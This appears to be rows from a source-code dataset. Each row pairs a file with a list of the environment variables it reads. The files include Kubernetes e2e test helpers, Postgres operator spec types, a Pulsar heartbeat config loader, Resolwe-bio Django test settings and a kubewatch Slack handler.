Kind: "ReplicationController",
APIVersion: api.Registry.GroupOrDie(v1.GroupName).GroupVersion.String(),
},
ObjectMeta: metav1.ObjectMeta{
Name: name,
},
Spec: v1.ReplicationControllerSpec{
Replicas: func(i int32) *int32 { return &i }(replicas),
Selector: map[string]string{
"name": name,
},
Template: &v1.PodTemplateSpec{
ObjectMeta: metav1.ObjectMeta{
Labels: labels,
},
Spec: v1.PodSpec{
Containers: []v1.Container{c},
TerminationGracePeriodSeconds: gracePeriod,
},
},
},
}
}
// SimpleGET executes a get on the given url, returns error if non-200 returned.
func SimpleGET(c *http.Client, url, host string) (string, error) {
req, err := http.NewRequest("GET", url, nil)
if err != nil {
return "", err
}
req.Host = host
res, err := c.Do(req)
if err != nil {
return "", err
}
defer res.Body.Close()
rawBody, err := ioutil.ReadAll(res.Body)
if err != nil {
return "", err
}
body := string(rawBody)
if res.StatusCode != http.StatusOK {
err = fmt.Errorf(
"GET returned http error %v", res.StatusCode)
}
return body, err
}
// PollURL polls till the url responds with a healthy http code. If
// expectUnreachable is true, it breaks on first non-healthy http code instead.
func PollURL(route, host string, timeout time.Duration, interval time.Duration, httpClient *http.Client, expectUnreachable bool) error {
var lastBody string
pollErr := wait.PollImmediate(interval, timeout, func() (bool, error) {
var err error
lastBody, err = SimpleGET(httpClient, route, host)
if err != nil {
Logf("host %v path %v: %v unreachable", host, route, err)
return expectUnreachable, nil
}
return !expectUnreachable, nil
})
if pollErr != nil {
return fmt.Errorf("Failed to execute a successful GET within %v, Last response body for %v, host %v:\n%v\n\n%v\n",
timeout, route, host, lastBody, pollErr)
}
return nil
}
func DescribeIng(ns string) {
Logf("\nOutput of kubectl describe ing:\n")
desc, _ := RunKubectl(
"describe", "ing", fmt.Sprintf("--namespace=%v", ns))
Logf(desc)
}
// NewTestPod returns a pod that has the specified requests and limits
func (f *Framework) NewTestPod(name string, requests v1.ResourceList, limits v1.ResourceList) *v1.Pod {
return &v1.Pod{
ObjectMeta: metav1.ObjectMeta{
Name: name,
},
Spec: v1.PodSpec{
Containers: []v1.Container{
{
Name: "pause",
Image: GetPauseImageName(f.ClientSet),
Resources: v1.ResourceRequirements{
Requests: requests,
Limits: limits,
},
},
},
},
}
}
// create empty file at given path on the pod.
func CreateEmptyFileOnPod(namespace string, podName string, filePath string) error {
_, err := RunKubectl("exec", fmt.Sprintf("--namespace=%s", namespace), podName, "--", "/bin/sh", "-c", fmt.Sprintf("touch %s", filePath))
return err
}
// GetAzureCloud returns azure cloud provider
func GetAzureCloud() (*azure.Cloud, error) {
cloud, ok := TestContext.CloudConfig.Provider.(*azure.Cloud)
if !ok {
return nil, fmt.Errorf("failed to convert CloudConfig.Provider to Azure: %#v", TestContext.CloudConfig.Provider)
}
return cloud, nil
}
func PrintSummaries(summaries []TestDataSummary, testBaseName string) {
now := time.Now()
for i := range summaries {
Logf("Printing summary: %v", summaries[i].SummaryKind())
switch TestContext.OutputPrintType {
case "hr":
if TestContext.ReportDir == "" {
Logf(summaries[i].PrintHumanReadable())
} else {
// TODO: learn to extract test name and append it to the kind instead of timestamp.
filePath := path.Join(TestContext.ReportDir, summaries[i].SummaryKind()+"_"+testBaseName+"_"+now.Format(time.RFC3339)+".txt")
if err := ioutil.WriteFile(filePath, []byte(summaries[i].PrintHumanReadable()), 0644); err != nil {
Logf("Failed to write file %v with test performance data: %v", filePath, err)
}
}
case "json":
fallthrough
default:
if TestContext.OutputPrintType != "json" {
Logf("Unknown output type: %v. Printing JSON", TestContext.OutputPrintType)
}
if TestContext.ReportDir == "" {
Logf("%v JSON\n%v", summaries[i].SummaryKind(), summaries[i].PrintJSON())
Logf("Finished")
} else {
// TODO: learn to extract test name and append it to the kind instead of timestamp.
filePath := path.Join(TestContext.ReportDir, summaries[i].SummaryKind()+"_"+testBaseName+"_"+now.Format(time.RFC3339)+".json")
if err := ioutil.WriteFile(filePath, []byte(summaries[i].PrintJSON()), 0644); err != nil {
Logf("Failed to write file %v with test performance data: %v", filePath, err)
}
}
}
}
}
| [
"\"KUBE_SSH_USER\"",
"\"USER\"",
"\"HOME\"",
"\"AWS_SSH_KEY\"",
"\"VAGRANT_SSH_KEY\"",
"\"LOCAL_SSH_KEY\""
] | [] | [
"VAGRANT_SSH_KEY",
"LOCAL_SSH_KEY",
"AWS_SSH_KEY",
"KUBE_SSH_USER",
"USER",
"HOME"
] | [] | ["VAGRANT_SSH_KEY", "LOCAL_SSH_KEY", "AWS_SSH_KEY", "KUBE_SSH_USER", "USER", "HOME"] | go | 6 | 0 | |
pkg/spec/types.go | package spec
import (
"database/sql"
"encoding/json"
"fmt"
"io/ioutil"
"log"
"os"
"strings"
"time"
"github.com/sirupsen/logrus"
"k8s.io/apimachinery/pkg/types"
"k8s.io/client-go/rest"
)
// NamespacedName describes the namespace/name pairs used in Kubernetes names.
type NamespacedName types.NamespacedName
const fileWithNamespace = "/var/run/secrets/kubernetes.io/serviceaccount/namespace"
// RoleOrigin contains the code of the origin of a role
type RoleOrigin int
// The rolesOrigin constant values must be sorted by the role priority for
// resolveNameConflict(...) to work.
const (
RoleOriginUnknown RoleOrigin = iota
RoleOriginManifest
RoleOriginInfrastructure
RoleOriginTeamsAPI
RoleOriginSystem
RoleOriginBootstrap
RoleConnectionPooler
)
type syncUserOperation int
// Possible values for the sync user operation (removal of users is not supported yet)
const (
PGSyncUserAdd = iota
PGsyncUserAlter
PGSyncAlterSet // handle ALTER ROLE SET parameter = value
)
// PgUser contains information about a single user.
type PgUser struct {
Origin RoleOrigin `yaml:"-"`
Name string `yaml:"-"`
Password string `yaml:"-"`
Flags []string `yaml:"user_flags"`
MemberOf []string `yaml:"inrole"`
Parameters map[string]string `yaml:"db_parameters"`
AdminRole string `yaml:"admin_role"`
}
// PgUserMap maps user names to the definitions.
type PgUserMap map[string]PgUser
// PgSyncUserRequest has information about a single request to sync a user.
type PgSyncUserRequest struct {
Kind syncUserOperation
User PgUser
}
// UserSyncer defines an interface for the implementations to sync users from the manifest to the DB.
type UserSyncer interface {
ProduceSyncRequests(dbUsers PgUserMap, newUsers PgUserMap) (req []PgSyncUserRequest)
ExecuteSyncRequests(req []PgSyncUserRequest, db *sql.DB) error
}
// LogEntry describes log entry in the RingLogger
type LogEntry struct {
Time time.Time
Level logrus.Level
ClusterName *NamespacedName `json:",omitempty"`
Worker *uint32 `json:",omitempty"`
Message string
}
// Diff describes diff
type Diff struct {
EventTime time.Time
ProcessTime time.Time
Diff []string
}
// ControllerStatus describes status of the controller
type ControllerStatus struct {
LastSyncTime int64
Clusters int
WorkerQueueSize map[int]int
}
// QueueDump describes cache.FIFO queue
type QueueDump struct {
Keys []string
List []interface{}
}
// ControllerConfig describes configuration of the controller
type ControllerConfig struct {
RestConfig *rest.Config `json:"-"`
InfrastructureRoles map[string]PgUser
NoDatabaseAccess bool
NoTeamsAPI bool
CRDReadyWaitInterval time.Duration
CRDReadyWaitTimeout time.Duration
ConfigMapName NamespacedName
Namespace string
}
// cached value for the GetOperatorNamespace
var operatorNamespace string
func (n NamespacedName) String() string {
return types.NamespacedName(n).String()
}
// MarshalJSON defines marshaling rule for the namespaced name type.
func (n NamespacedName) MarshalJSON() ([]byte, error) {
return []byte("\"" + n.String() + "\""), nil
}
// Decode converts a (possibly unqualified) string into the namespaced name object.
func (n *NamespacedName) Decode(value string) error {
return n.DecodeWorker(value, GetOperatorNamespace())
}
// UnmarshalJSON converts a byte slice to NamespacedName
func (n *NamespacedName) UnmarshalJSON(data []byte) error {
result := NamespacedName{}
var tmp string
if err := json.Unmarshal(data, &tmp); err != nil {
return err
}
if err := result.Decode(tmp); err != nil {
return err
}
*n = result
return nil
}
// DecodeWorker separates the decode logic to (unit) test
// from obtaining the operator namespace that depends on k8s mounting files at runtime
func (n *NamespacedName) DecodeWorker(value, operatorNamespace string) error {
var (
name types.NamespacedName
)
result := strings.SplitN(value, string(types.Separator), 2)
if len(result) < 2 {
name.Name = result[0]
} else {
name.Name = strings.TrimLeft(result[1], string(types.Separator))
name.Namespace = result[0]
}
if name.Name == "" {
return fmt.Errorf("incorrect namespaced name: %v", value)
}
if name.Namespace == "" {
name.Namespace = operatorNamespace
}
*n = NamespacedName(name)
return nil
}
func (r RoleOrigin) String() string {
switch r {
case RoleOriginUnknown:
return "unknown"
case RoleOriginManifest:
return "manifest role"
case RoleOriginInfrastructure:
return "infrastructure role"
case RoleOriginTeamsAPI:
return "teams API role"
case RoleOriginSystem:
return "system role"
case RoleOriginBootstrap:
return "bootstrapped role"
case RoleConnectionPooler:
return "connection pooler role"
default:
panic(fmt.Sprintf("bogus role origin value %d", r))
}
}
// GetOperatorNamespace assumes serviceaccount secret is mounted by kubernetes
// Placing this func here instead of pgk/util avoids circular import
func GetOperatorNamespace() string {
if operatorNamespace == "" {
if namespaceFromEnvironment := os.Getenv("OPERATOR_NAMESPACE"); namespaceFromEnvironment != "" {
return namespaceFromEnvironment
}
operatorNamespaceBytes, err := ioutil.ReadFile(fileWithNamespace)
if err != nil {
log.Fatalf("Unable to detect operator namespace from within its pod due to: %v", err)
}
operatorNamespace = string(operatorNamespaceBytes)
}
return operatorNamespace
}
| [
"\"OPERATOR_NAMESPACE\""
] | [] | [
"OPERATOR_NAMESPACE"
] | [] | ["OPERATOR_NAMESPACE"] | go | 1 | 0 | |
src/cfg/config.go | //
// Copyright (c) 2020-2021 Datastax, Inc.
//
// Licensed to the Apache Software Foundation (ASF) under one
// or more contributor license agreements. See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership. The ASF licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
//
package cfg
import (
"bytes"
"encoding/json"
"io/ioutil"
"os"
"strings"
"time"
"unicode"
"github.com/datastax/pulsar-heartbeat/src/util"
"github.com/apex/log"
"github.com/ghodss/yaml"
)
// PrometheusCfg configures Premetheus set up
type PrometheusCfg struct {
Port string `json:"port"`
ExposeMetrics bool `json:"exposeMetrics"`
PrometheusProxyURL string `json:"prometheusProxyURL"`
PrometheusProxyAPIKey string `json:"prometheusProxyAPIKey"`
}
// SlackCfg is slack configuration
type SlackCfg struct {
AlertURL string `json:"alertUrl"`
Verbose bool `json:"verbose"`
}
// OpsGenieCfg is opsGenie configuration
type OpsGenieCfg struct {
HeartBeatURL string `json:"heartbeatUrl"`
HeartbeatKey string `json:"heartbeatKey"`
AlertKey string `json:"alertKey"`
IntervalSeconds int `json:"intervalSeconds"`
}
// PagerDutyCfg is opsGenie configuration
type PagerDutyCfg struct {
IntegrationKey string `json:"integrationKey"`
}
// AnalyticsCfg is analytics usage and statistucs tracking configuration
type AnalyticsCfg struct {
APIKey string `json:"apiKey"`
IngestionURL string `json:"ingestionUrl"`
InsightsWriteKey string `json:"insightsWriteKey"`
InsightsAccountID string `json:"insightsAccountId"`
}
// SiteCfg configures general website
type SiteCfg struct {
Headers map[string]string `json:"headers"`
URL string `json:"url"`
Name string `json:"name"`
IntervalSeconds int `json:"intervalSeconds"`
ResponseSeconds int `json:"responseSeconds"`
StatusCode int `json:"statusCode"`
StatusCodeExpr string `json:"statusCodeExpr"`
Retries int `json:"retries"`
AlertPolicy AlertPolicyCfg `json:"alertPolicy"`
}
// SitesCfg configures a list of website`
type SitesCfg struct {
Sites []SiteCfg `json:"sites"`
}
// OpsClusterCfg is each cluster's configuration
type OpsClusterCfg struct {
Name string `json:"name"`
URL string `json:"url"`
AlertPolicy AlertPolicyCfg `json:"alertPolicy"`
}
// PulsarAdminRESTCfg is for monitor a list of Pulsar cluster
type PulsarAdminRESTCfg struct {
Token string `json:"Token"`
Clusters []OpsClusterCfg `json:"clusters"`
IntervalSeconds int `json:"intervalSeconds"`
}
// TopicCfg is topic configuration
type TopicCfg struct {
Name string `json:"name"`
ClusterName string `json:"clusterName"` // used for broker monitoring if specified
Token string `json:"token"`
TrustStore string `json:"trustStore"`
NumberOfPartitions int `json:"numberOfPartitions"`
LatencyBudgetMs int `json:"latencyBudgetMs"`
PulsarURL string `json:"pulsarUrl"`
AdminURL string `json:"adminUrl"`
TopicName string `json:"topicName"`
OutputTopic string `json:"outputTopic"`
IntervalSeconds int `json:"intervalSeconds"`
ExpectedMsg string `json:"expectedMsg"`
PayloadSizes []string `json:"payloadSizes"`
NumOfMessages int `json:"numberOfMessages"`
AlertPolicy AlertPolicyCfg `json:"AlertPolicy"`
DowntimeTrackerDisabled bool `json:"downtimeTrackerDisabled"`
}
// WsConfig is configuration to monitor WebSocket pub sub latency
type WsConfig struct {
Name string `json:"name"`
Token string `json:"token"`
Cluster string `json:"cluster"` // can be used for alert de-dupe
LatencyBudgetMs int `json:"latencyBudgetMs"`
ProducerURL string `json:"producerUrl"`
ConsumerURL string `json:"consumerUrl"`
TopicName string `json:"topicName"`
IntervalSeconds int `json:"intervalSeconds"`
Scheme string `json:"scheme"`
Port string `json:"port"`
Subscription string `json:"subscription"`
URLQueryParams string `json:"urlQueryParams"`
AlertPolicy AlertPolicyCfg `json:"AlertPolicy"`
}
// K8sClusterCfg is configuration to monitor kubernete cluster
// only to be enabled in-cluster monitoring
type K8sClusterCfg struct {
Enabled bool `json:"enabled"`
PulsarNamespace string `json:"pulsarNamespace"`
KubeConfigDir string `json:"kubeConfigDir"`
AlertPolicy AlertPolicyCfg `json:"AlertPolicy"`
}
// BrokersCfg monitors all brokers in the cluster
type BrokersCfg struct {
InClusterRESTURL string `json:"inclusterRestURL"`
IntervalSeconds int `json:"intervalSeconds"`
AlertPolicy AlertPolicyCfg `json:"AlertPolicy"`
}
// TenantUsageCfg tenant usage reporting and monitoring
type TenantUsageCfg struct {
OutBytesLimit uint64 `json:"outBytesLimit"`
AlertIntervalMinutes int `json:"alertIntervalMinutes"`
}
// Configuration - this server's configuration
type Configuration struct {
// Name is the Pulsar cluster name, it is mandatory
Name string `json:"name"`
// ClusterName is the Pulsar cluster name if the Name cannot be used as the Pulsar cluster name, optional
ClusterName string `json:"clusterName"`
// TokenFilePath is the file path to Pulsar JWT. It takes precedence of the token attribute.
TokenFilePath string `json:"tokenFilePath"`
// Token is a Pulsar JWT can be used for both client client or http admin client
Token string `json:"token"`
BrokersConfig BrokersCfg `json:"brokersConfig"`
TrustStore string `json:"trustStore"`
K8sConfig K8sClusterCfg `json:"k8sConfig"`
AnalyticsConfig AnalyticsCfg `json:"analyticsConfig"`
PrometheusConfig PrometheusCfg `json:"prometheusConfig"`
SlackConfig SlackCfg `json:"slackConfig"`
OpsGenieConfig OpsGenieCfg `json:"opsGenieConfig"`
PagerDutyConfig PagerDutyCfg `json:"pagerDutyConfig"`
PulsarAdminConfig PulsarAdminRESTCfg `json:"pulsarAdminRestConfig"`
PulsarTopicConfig []TopicCfg `json:"pulsarTopicConfig"`
SitesConfig SitesCfg `json:"sitesConfig"`
WebSocketConfig []WsConfig `json:"webSocketConfig"`
TenantUsageConfig TenantUsageCfg `json:"tenantUsageConfig"`
}
// AlertPolicyCfg is a set of criteria to evaluation triggers for incident alert
type AlertPolicyCfg struct {
// first evaluation to count continuous failure
Ceiling int `json:"ceiling"`
// Second evaluation for moving window
MovingWindowSeconds int `json:"movingWindowSeconds"`
CeilingInMovingWindow int `json:"ceilingInMovingWindow"`
}
// Config - this server's configuration instance
var Config Configuration
// ReadConfigFile reads configuration file.
func ReadConfigFile(configFile string) {
fileBytes, err := ioutil.ReadFile(configFile)
if err != nil {
log.Errorf("failed to load configuration file %s", configFile)
panic(err)
}
if hasJSONPrefix(fileBytes) {
err = json.Unmarshal(fileBytes, &Config)
if err != nil {
panic(err)
}
} else {
err = yaml.Unmarshal(fileBytes, &Config)
if err != nil {
panic(err)
}
}
if len(Config.Name) < 1 {
panic("a valid `name` in Configuration must be specified")
}
// reconcile the JWT
if len(Config.TokenFilePath) > 1 {
tokenBytes, err := ioutil.ReadFile(Config.TokenFilePath)
if err != nil {
log.Errorf("failed to read Pulsar JWT from a file %s", Config.TokenFilePath)
} else {
log.Infof("read Pulsar token from the file %s", Config.TokenFilePath)
Config.Token = string(tokenBytes)
}
}
Config.Token = strings.TrimSuffix(util.AssignString(Config.Token, os.Getenv("PulsarToken")), "\n")
log.Infof("config %v", Config)
}
var jsonPrefix = []byte("{")
func hasJSONPrefix(buf []byte) bool {
return hasPrefix(buf, jsonPrefix)
}
// Return true if the first non-whitespace bytes in buf is prefix.
func hasPrefix(buf []byte, prefix []byte) bool {
trim := bytes.TrimLeftFunc(buf, unicode.IsSpace)
return bytes.HasPrefix(trim, prefix)
}
//GetConfig returns a reference to the Configuration
func GetConfig() *Configuration {
return &Config
}
//
type monitorFunc func()
// RunInterval runs interval
func RunInterval(fn monitorFunc, interval time.Duration) {
go func() {
ticker := time.NewTicker(interval)
defer ticker.Stop()
fn()
for {
select {
case <-ticker.C:
fn()
}
}
}()
}
| [
"\"PulsarToken\""
] | [] | [
"PulsarToken"
] | [] | ["PulsarToken"] | go | 1 | 0 | |
tests/settings.py | """
Django settings for running tests for Resolwe package.
"""
import os
import re
from distutils.util import strtobool # pylint: disable=import-error,no-name-in-module
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
SECRET_KEY = 'secret'
# TODO: Remove this setting completely and only set it in the tests that require it.
RESOLWE_HOST_URL = 'https://dummy.host.local'
DEBUG = True
ALLOWED_HOSTS = ['*']
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.staticfiles',
'channels',
'rest_framework',
'guardian',
'versionfield',
'resolwe',
'resolwe.permissions',
'resolwe.flow',
'resolwe.elastic',
'resolwe.toolkit',
'resolwe.test_helpers',
'resolwe_bio',
'resolwe_bio.kb',
)
ROOT_URLCONF = 'tests.urls'
TEST_RUNNER = 'resolwe.test_helpers.test_runner.ResolweRunner'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
],
},
},
]
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'guardian.backends.ObjectPermissionBackend',
)
ANONYMOUS_USER_ID = -1
# Check if PostgreSQL settings are set via environment variables
pgname = os.environ.get('RESOLWE_POSTGRESQL_NAME', 'resolwe-bio')
pguser = os.environ.get('RESOLWE_POSTGRESQL_USER', 'resolwe')
pghost = os.environ.get('RESOLWE_POSTGRESQL_HOST', 'localhost')
pgport = int(os.environ.get('RESOLWE_POSTGRESQL_PORT', 55433))
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': pgname,
'USER': pguser,
'HOST': pghost,
'PORT': pgport,
}
}
STATIC_URL = '/static/'
REDIS_CONNECTION = {
'host': 'localhost',
'port': int(os.environ.get('RESOLWE_REDIS_PORT', 56380)),
'db': int(os.environ.get('RESOLWE_REDIS_DATABASE', 0)),
}
FLOW_EXECUTOR = {
'NAME': 'resolwe.flow.executors.docker',
# XXX: Change to a stable resolwe image when it will include all the required tools
'CONTAINER_IMAGE': 'resolwe/bio-linux8-resolwe-preview',
'CONTAINER_NAME_PREFIX': 'resolwebio',
'REDIS_CONNECTION': REDIS_CONNECTION,
'DATA_DIR': os.path.join(PROJECT_ROOT, 'test_data'),
'UPLOAD_DIR': os.path.join(PROJECT_ROOT, 'test_upload'),
'RUNTIME_DIR': os.path.join(PROJECT_ROOT, 'test_runtime'),
}
# Set custom executor command if set via environment variable
if 'RESOLWE_DOCKER_COMMAND' in os.environ:
FLOW_DOCKER_COMMAND = os.environ['RESOLWE_DOCKER_COMMAND']
FLOW_API = {
'PERMISSIONS': 'resolwe.permissions.permissions',
}
FLOW_EXPRESSION_ENGINES = [
{
'ENGINE': 'resolwe.flow.expression_engines.jinja',
'CUSTOM_FILTERS': [
'resolwe_bio.expression_filters.sample',
'resolwe_bio.expression_filters.relation',
]
},
]
FLOW_EXECUTION_ENGINES = [
'resolwe.flow.execution_engines.bash',
'resolwe.flow.execution_engines.workflow',
'resolwe.flow.execution_engines.python',
]
# Check if any Manager settings are set via environment variables
manager_prefix = os.environ.get('RESOLWE_MANAGER_REDIS_PREFIX', 'resolwe-bio.manager')
# Ensure Manager channel prefix is a valid Django Channels name.
manager_prefix = re.sub('[^0-9a-zA-Z.-]', '-', manager_prefix)
FLOW_MANAGER = {
'NAME': 'resolwe.flow.managers.workload_connectors.local',
'REDIS_PREFIX': manager_prefix,
'REDIS_CONNECTION': REDIS_CONNECTION,
}
FLOW_DOCKER_VOLUME_EXTRA_OPTIONS = {
'data': 'Z',
'data_all': 'z',
'upload': 'z',
'secrets': 'Z',
'users': 'Z',
'tools': 'z',
'runtime': 'Z',
}
FLOW_PROCESS_MAX_CORES = 1
# Don't pull Docker images if set via the environment variable.
FLOW_DOCKER_DONT_PULL = strtobool(os.environ.get('RESOLWE_DOCKER_DONT_PULL', '0'))
# Disable SECCOMP if set via environment variable.
FLOW_DOCKER_DISABLE_SECCOMP = strtobool(os.environ.get('RESOLWE_DOCKER_DISABLE_SECCOMP', '0'))
# Ensure all container images follow a specific format.
FLOW_CONTAINER_VALIDATE_IMAGE = r'.+:(?!latest)'
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.SessionAuthentication',
),
'DEFAULT_FILTER_BACKENDS': (
'resolwe.permissions.filters.ResolwePermissionsFilter',
'django_filters.rest_framework.backends.DjangoFilterBackend',
),
# Python<3.7 cannot parse iso-8601 formatted datetimes with tz-info form
# "+01:00" (DRF default). It can only parse "+0100" form, so we need to
# modify this setting. This will be fixed in Python3.7, where "+01:00" can
# be parsed by ``datetime.datetime.strptime`` syntax.
# For more, check "%z" syntax description in:
# https://docs.python.org/3.7/library/datetime.html#strftime-and-strptime-behavior
'DATETIME_FORMAT': '%Y-%m-%dT%H:%M:%S.%f%z'
}
# Time
USE_TZ = True
TIME_ZONE = 'UTC'
# Django does not support parsing of 'iso-8601' formated datetimes by default.
# Since Django-filters uses Django forms for parsing, we need to modify Django
# setting ``DATETIME_INPUT_FORMATS`` to support 'iso-8601' format.
# https://docs.djangoproject.com/en/1.11/ref/settings/#datetime-input-formats
DATETIME_INPUT_FORMATS = (
# These are already given Django defaults:
'%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59'
'%Y-%m-%d %H:%M:%S.%f', # '2006-10-25 14:30:59.000200'
'%Y-%m-%d %H:%M', # '2006-10-25 14:30'
'%Y-%m-%d', # '2006-10-25'
# These are iso-8601 formatted:
'%Y-%m-%dT%H:%M:%S.%f%z', # '2006-10-25T14:30:59.000200+0200' or '2006-10-25T14:30:59.000200+02:00' (Python>=3.7)
'%Y-%m-%dT%H:%M:%S.%fZ', # '2006-10-25T14:30:59.000200Z'
'%Y-%m-%dT%H:%M:%S.%f', # '2006-10-25T14:30:59.000200'
'%Y-%m-%dT%H:%M:%SZ', # '2006-10-25T14:30:59Z'
'%Y-%m-%dT%H:%M:%S', # '2006-10-25T14:30:59'
'%Y-%m-%dT%H:%M', # '2006-10-25T14:30'
)
FLOW_PROCESSES_FINDERS = (
'resolwe.flow.finders.FileSystemProcessesFinder',
'resolwe.flow.finders.AppDirectoriesFinder',
)
FLOW_PROCESSES_DIRS = (os.path.join(PROJECT_ROOT, '../resolwe_bio/processes/'),)
# Do not skip tests that fail on Docker executor if this is set via environment
# variable
if os.environ.get('RESOLWEBIO_TESTS_SKIP_DOCKER_FAILURES', '').lower() in ["no", "false"]:
TESTS_SKIP_DOCKER_FAILURES = False
# Elastic Search.
ELASTICSEARCH_HOST = os.environ.get('RESOLWE_ES_HOST', 'localhost')
ELASTICSEARCH_PORT = int(os.environ.get('RESOLWE_ES_PORT', '59201'))
# Testing.
TEST_RUNNER = 'resolwe.test_helpers.test_runner.ResolweRunner'
TEST_PROCESS_REQUIRE_TAGS = True
# Don't profile unless set via the environment variable.
TEST_PROCESS_PROFILE = strtobool(os.environ.get('RESOLWE_TEST_PROCESS_PROFILE', '0'))
# Channels.
ASGI_APPLICATION = 'tests.routing.channel_routing'
CHANNEL_LAYERS = {
'default': {
'BACKEND': 'channels_redis.core.RedisChannelLayer',
'CONFIG': {
'hosts': [(REDIS_CONNECTION['host'], REDIS_CONNECTION['port'])],
'expiry': 3600,
},
},
}
# Logging.
# Set RESOLWEBIO_LOG_FILE environment variable to a file path to enable logging
# debugging messages to to a file.
log_file_path = os.environ.get('RESOLWEBIO_LOG_FILE', os.devnull) # pylint: disable=invalid-name
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': '%(asctime)s - %(levelname)s - %(name)s[%(process)s]: %(message)s',
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'level': 'WARNING',
'formatter': 'standard',
},
'file': {
'class': 'logging.handlers.RotatingFileHandler',
'filename': log_file_path,
'formatter': 'standard',
'maxBytes': 1024 * 1024 * 10, # 10 MB
},
},
'loggers': {
'': {
'handlers': ['file'],
'level': 'DEBUG',
},
'elasticsearch': {
'handlers': ['file'],
'level': 'WARNING',
'propagate': False,
},
'urllib3': {
'handlers': ['file'],
'level': 'WARNING',
'propagate': False,
},
}
}
| [] | [] | [
"RESOLWEBIO_LOG_FILE",
"RESOLWE_POSTGRESQL_NAME",
"RESOLWE_DOCKER_COMMAND",
"RESOLWE_ES_HOST",
"RESOLWE_POSTGRESQL_PORT",
"RESOLWE_ES_PORT",
"RESOLWE_MANAGER_REDIS_PREFIX",
"RESOLWE_DOCKER_DONT_PULL",
"RESOLWEBIO_TESTS_SKIP_DOCKER_FAILURES",
"RESOLWE_REDIS_PORT",
"RESOLWE_POSTGRESQL_USER",
"RESOLWE_POSTGRESQL_HOST",
"RESOLWE_TEST_PROCESS_PROFILE",
"RESOLWE_DOCKER_DISABLE_SECCOMP",
"RESOLWE_REDIS_DATABASE"
] | [] | ["RESOLWEBIO_LOG_FILE", "RESOLWE_POSTGRESQL_NAME", "RESOLWE_DOCKER_COMMAND", "RESOLWE_ES_HOST", "RESOLWE_POSTGRESQL_PORT", "RESOLWE_ES_PORT", "RESOLWE_MANAGER_REDIS_PREFIX", "RESOLWE_DOCKER_DONT_PULL", "RESOLWEBIO_TESTS_SKIP_DOCKER_FAILURES", "RESOLWE_REDIS_PORT", "RESOLWE_POSTGRESQL_USER", "RESOLWE_POSTGRESQL_HOST", "RESOLWE_TEST_PROCESS_PROFILE", "RESOLWE_DOCKER_DISABLE_SECCOMP", "RESOLWE_REDIS_DATABASE"] | python | 15 | 0 | |
pkg/handlers/slack/slack.go | /*
Copyright 2016 Skippbox, Ltd.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package slack
import (
"fmt"
"log"
"os"
"github.com/nlopes/slack"
"github.com/skippbox/kubewatch/config"
"github.com/skippbox/kubewatch/pkg/event"
kbEvent "github.com/skippbox/kubewatch/pkg/event"
)
var slackColors = map[string]string{
"Normal": "good",
"Warning": "warning",
"Danger": "danger",
}
var slackErrMsg = `
%s
You need to set both slack token and channel for slack notify,
using "--token/-t" and "--channel/-c", or using environment variables:
export KW_SLACK_TOKEN=slack_token
export KW_SLACK_CHANNEL=slack_channel
Command line flags will override environment variables
`
// Slack handler implements handler.Handler interface,
// Notify event to slack channel
type Slack struct {
Token string
Channel string
}
// Init prepares slack configuration
func (s *Slack) Init(c *config.Config) error {
token := c.Handler.Slack.Token
channel := c.Handler.Slack.Channel
if token == "" {
token = os.Getenv("KW_SLACK_TOKEN")
}
if channel == "" {
channel = os.Getenv("KW_SLACK_CHANNEL")
}
s.Token = token
s.Channel = channel
return checkMissingSlackVars(s)
}
func (s *Slack) ObjectCreated(obj interface{}) {
notifySlack(s, obj, "created")
}
func (s *Slack) ObjectDeleted(obj interface{}) {
notifySlack(s, obj, "deleted")
}
func (s *Slack) ObjectUpdated(oldObj, newObj interface{}) {
notifySlack(s, newObj, "updated")
}
func notifySlack(s *Slack, obj interface{}, action string) {
e := kbEvent.New(obj, action)
api := slack.New(s.Token)
params := slack.PostMessageParameters{}
attachment := prepareSlackAttachment(e)
params.Attachments = []slack.Attachment{attachment}
params.AsUser = true
channelID, timestamp, err := api.PostMessage(s.Channel, "", params)
if err != nil {
log.Printf("%s\n", err)
return
}
log.Printf("Message successfully sent to channel %s at %s", channelID, timestamp)
}
func checkMissingSlackVars(s *Slack) error {
if s.Token == "" || s.Channel == "" {
return fmt.Errorf(slackErrMsg, "Missing slack token or channel")
}
return nil
}
func prepareSlackAttachment(e event.Event) slack.Attachment {
msg := fmt.Sprintf(
"A %s in namespace %s has been %s: %s",
e.Kind,
e.Namespace,
e.Reason,
e.Name,
)
attachment := slack.Attachment{
Fields: []slack.AttachmentField{
slack.AttachmentField{
Title: "kubewatch",
Value: msg,
},
},
}
if color, ok := slackColors[e.Status]; ok {
attachment.Color = color
}
attachment.MarkdownIn = []string{"fields"}
return attachment
}
| [
"\"KW_SLACK_TOKEN\"",
"\"KW_SLACK_CHANNEL\""
